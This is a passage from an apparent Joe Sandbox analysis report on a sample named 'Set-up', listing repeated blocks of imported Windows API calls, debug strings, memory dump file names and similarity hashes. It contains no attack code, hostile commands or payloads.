                          • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 00B27843
                          • fread.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B2786B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: fseek$ErrorLastfclosefopenfreadftell
                          • String ID:
                          • API String ID: 1915723720-0
                          • Opcode ID: dceec2ba982ee69c20fa363a64ceaa042deace054d75d9c413d60defb5e97ef4
                          • Instruction ID: 0f022d4eb8aacaa816e8e62b7b64effd760cc4473282545f528b4e882fbe3cbe
                          • Opcode Fuzzy Hash: dceec2ba982ee69c20fa363a64ceaa042deace054d75d9c413d60defb5e97ef4
                          • Instruction Fuzzy Hash: DF1196E2E8935067EB2125237C8AB7B75C8DB51364F180478FD0DDE282FE66D804D1B6
                          APIs
                          • getsockname.WS2_32(?,?,00000080), ref: 00A9A1C6
                          • WSAGetLastError.WS2_32 ref: 00A9A1D0
                            • Part of subcall function 00A7D090: GetLastError.KERNEL32 ref: 00A7D0A1
                            • Part of subcall function 00A7D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A7D0A9
                            • Part of subcall function 00A7D090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A7D0CD
                            • Part of subcall function 00A7D090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A7D0D7
                            • Part of subcall function 00A7D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 00A7D381
                            • Part of subcall function 00A7D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 00A7D3A2
                            • Part of subcall function 00A7D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A7D3BF
                            • Part of subcall function 00A7D090: GetLastError.KERNEL32 ref: 00A7D3C9
                            • Part of subcall function 00A7D090: SetLastError.KERNEL32(00000000), ref: 00A7D3D4
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A9A21C
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A9A220
                          Strings
                          • getsockname() failed with errno %d: %s, xrefs: 00A9A1F0
                          • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00A9A23B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: ErrorLast_errno$strrchr$__sys_errlist__sys_nerrgetsockname
                          • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                          • API String ID: 2076026050-2605427207
                          • Opcode ID: 5f6364c57a30f37fb4d146671e128edda78d781291d142642aaf5f4729a65749
                          • Instruction ID: 6bb69ed9b9d72c5c4a510957a70ffe33f778b3d9ff81408574de727270217663
                          • Opcode Fuzzy Hash: 5f6364c57a30f37fb4d146671e128edda78d781291d142642aaf5f4729a65749
                          • Instruction Fuzzy Hash: 2021F831908280AAFB259B18EC47FE677FCEF91324F044215F98853151FB32698687E2
                          APIs
                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00A63BA6,?,010EF044,00A61BD2), ref: 00A673A6
                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00A63BA6,?,010EF044,00A61BD2), ref: 00A673CA
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00A63BA6,?,010EF044,00A61BD2), ref: 00A673D2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: __acrt_iob_func_errnofflush
                          • String ID: LIMIT %s:%d %s reached memlimit$MEM %s:%d calloc(%zu,%zu) = %p$calloc
                          • API String ID: 4185500129-1340350808
                          • Opcode ID: 574e9879ec976b29c4702251632cde4c1741609bd0ad6925ac621a52efb4183b
                          • Instruction ID: 271ad812d3d3bab038e6af778c54281c6b58631f411bce7abb104cbc045ce8e0
                          • Opcode Fuzzy Hash: 574e9879ec976b29c4702251632cde4c1741609bd0ad6925ac621a52efb4183b
                          • Instruction Fuzzy Hash: B921D871A143566BD7309F16EC46E5B7BE8EF85B58F04041CFC88DA341E762D90097B2
                          APIs
                          • WSAStartup.WS2_32(00000202), ref: 00A7D65A
                            • Part of subcall function 00A7D690: GetModuleHandleA.KERNEL32(kernel32,00000000,?,?,?,00A7D5FA,iphlpapi.dll), ref: 00A7D699
                            • Part of subcall function 00A7D690: GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 00A7D6B5
                            • Part of subcall function 00A7D690: strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,00FA0814,?,?,00A7D5FA,iphlpapi.dll), ref: 00A7D6C3
                          • GetProcAddress.KERNEL32(00000000,if_nametoindex), ref: 00A7D60C
                          • QueryPerformanceFrequency.KERNEL32(010EF070), ref: 00A7D643
                          • WSACleanup.WS2_32 ref: 00A7D67C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: AddressProc$CleanupFrequencyHandleModulePerformanceQueryStartupstrpbrk
                          • String ID: if_nametoindex$iphlpapi.dll
                          • API String ID: 3452087986-3097795196
                          • Opcode ID: bbf6a577a5eb1ff6d4eec12701072c2c666dfae2f37b0ff0f2c9515281b9353b
                          • Instruction ID: d44c2c80d71bc2f8173003e60a65110a1a1dc539db4101ca37496de361454bbb
                          • Opcode Fuzzy Hash: bbf6a577a5eb1ff6d4eec12701072c2c666dfae2f37b0ff0f2c9515281b9353b
                          • Instruction Fuzzy Hash: A501BCB0A003415BE7217B29AD0B3657AA0AF91700F85846CE888D9186FB7EC598C752
                          APIs
                          • htonl.WS2_32(7F000001), ref: 00B14A21
                          • gethostname.WS2_32(00000000,00000040), ref: 00B14AA4
                          • WSAGetLastError.WS2_32 ref: 00B14AB3
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000002E), ref: 00B14B3F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: ErrorLastgethostnamehtonlstrchr
                          • String ID:
                          • API String ID: 655544046-0
                          • Opcode ID: 14691a9f0d5ae6aa6e33d1b188df75202548411f68312a24870d35ccc900d8af
                          • Instruction ID: 5684bff3ee24104e95fb39907ebc4841329897f5cc8529a06785de30518f0b5e
                          • Opcode Fuzzy Hash: 14691a9f0d5ae6aa6e33d1b188df75202548411f68312a24870d35ccc900d8af
                          • Instruction Fuzzy Hash: 1951F2706087008FE7309F25ED49BA776E4EF05755F9408BCE98A8A6D1E779E8C4CB02
                          APIs
                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00F42EED), ref: 00F42E18
                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00F42EED), ref: 00F42E34
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00F42EED), ref: 00F42E9F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: calloc$free
                          • String ID:
                          • API String ID: 171065143-3916222277
                          • Opcode ID: 8340da7b55f8b6a8bc0a2f8e4c64574dca93e33a5ee7a9c920fa0ab7d3e38a0b
                          • Instruction ID: d453de4b64a64136f1be3869157916c961c4c3bbbfd84bf56cfae4eaa763a84e
                          • Opcode Fuzzy Hash: 8340da7b55f8b6a8bc0a2f8e4c64574dca93e33a5ee7a9c920fa0ab7d3e38a0b
                          • Instruction Fuzzy Hash: 5C1130B1904B018FC724EF29C88065ABBE0FF59324F554B6DE8A99B291D730DD05DBA1
                          APIs
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A612EB
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00A61323
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A6132E
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00A61344
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: malloc$memcpystrlen
                          • String ID:
                          • API String ID: 3553820921-0
                          • Opcode ID: 01d85b11d09730fbc40c736d2a7591fbb8035e195df7775a3ce2b1e9988ca6e9
                          • Instruction ID: e05fba3370ac7038455759d552b00acb9d3098b251084509c55bfcbc1579a1c4
                          • Opcode Fuzzy Hash: 01d85b11d09730fbc40c736d2a7591fbb8035e195df7775a3ce2b1e9988ca6e9
                          • Instruction Fuzzy Hash: F43137B59043168FDB20DF66D484399BBF1FB89300F08892DD989AB346D736A905DF91
                          APIs
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A612EB
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00A61323
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A6132E
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00A61344
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: malloc$memcpystrlen
                          • String ID:
                          • API String ID: 3553820921-0
                          • Opcode ID: 0834244497133286b4f4a7a6fb1d346a4ae6a406affd08dacd0feb986bec0161
                          • Instruction ID: 1f724c6a23b5c57ed61d3153005243cd3037a6d1870f9d29d0569699aee61695
                          • Opcode Fuzzy Hash: 0834244497133286b4f4a7a6fb1d346a4ae6a406affd08dacd0feb986bec0161
                          • Instruction Fuzzy Hash: 332103B59053068FCB20EF26E4842A9BBF0FB88700B148929E988AB315D735A901DF61
                          APIs
                          • AcquireSRWLockExclusive.KERNEL32(010EF044,00A6208F), ref: 00A63AB5
                          • ReleaseSRWLockExclusive.KERNEL32(010EF044,010EF044,00A6208F), ref: 00A63AD0
                          • ReleaseSRWLockExclusive.KERNEL32(010EF044), ref: 00A63B02
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: ExclusiveLock$Release$Acquire
                          • String ID:
                          • API String ID: 1021914862-0
                          • Opcode ID: 93707c342a920face396022b32250afb54c2cff33496eae38eb5f85e50640f8a
                          • Instruction ID: 90561bcd43774392a06babeac583a32ff0c09d64db79fea54bd4b4369bf1f96b
                          • Opcode Fuzzy Hash: 93707c342a920face396022b32250afb54c2cff33496eae38eb5f85e50640f8a
                          • Instruction Fuzzy Hash: D8E0E6756001039EDA20BBA39947A1939E1AF10F407C4845477A9A9156DE7F55046772
                          APIs
                          • closesocket.WS2_32(?), ref: 00A678BB
                            • Part of subcall function 00A672A0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,000003FF), ref: 00A672F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: closesocketfwrite
                          • String ID: FD %s:%d sclose(%d)
                          • API String ID: 1967222983-3116021458
                          • Opcode ID: 0be6ac24ee0ba51378d58e11a161028ffd8f768accb9398ec264860d05cecb9d
                          • Instruction ID: 2eca632b24e70d10bf7fb2851dac0b84283398416020405aca5a04ef287e5ec0
                          • Opcode Fuzzy Hash: 0be6ac24ee0ba51378d58e11a161028ffd8f768accb9398ec264860d05cecb9d
                          • Instruction Fuzzy Hash: ECD05E32A292206B8630AA68BD49C9F7BB8DEC5F60B090558F94067205D2209C41D7E2
                          APIs
                          • connect.WS2_32(-00000028,-00000028,-00000028), ref: 00B2B0B9
                          • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00B13C41,00000000), ref: 00B2B0C1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: ErrorLastconnect
                          • String ID:
                          • API String ID: 374722065-0
                          • Opcode ID: ea370a1293b91f8a8130011e36626f982d3ed2d8e51ecab36c73caf72371a877
                          • Instruction ID: a98da42ab064bb8ccda68b467e517c3d8994172887011415b4eb3be6ae810f2b
                          • Opcode Fuzzy Hash: ea370a1293b91f8a8130011e36626f982d3ed2d8e51ecab36c73caf72371a877
                          • Instruction Fuzzy Hash: AD01D4322042109BCB215A68E884F6BB7E9FF88374F0407A9F97C971D1DB26ED508752
                          APIs
                          • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00F43C1F), ref: 00F43B89
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00F43C1F), ref: 00F43BAC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
